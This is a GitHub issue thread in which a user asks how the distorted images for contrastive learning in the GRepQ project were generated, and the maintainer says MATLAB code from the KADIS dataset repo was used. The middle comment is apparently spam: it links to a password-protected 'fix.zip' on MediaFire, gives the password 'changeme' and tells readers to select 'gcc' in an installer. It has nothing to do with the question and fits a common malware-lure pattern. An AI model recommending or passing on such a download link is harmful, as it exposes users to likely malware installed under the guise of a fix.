### ISSUE TITLE
The code for generate distortion images

### ISSUE THREAD

**Issue by superxi** [suhas-srinath/GRepQ#3]
Hi, Is there any code for how to generate the distortion images for contrastive leanrning ?

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by suhas-srinath** [comment]
Hi, sorry for the long delay. We used the matlab codes from the same repo used to generate the KADIS dataset.
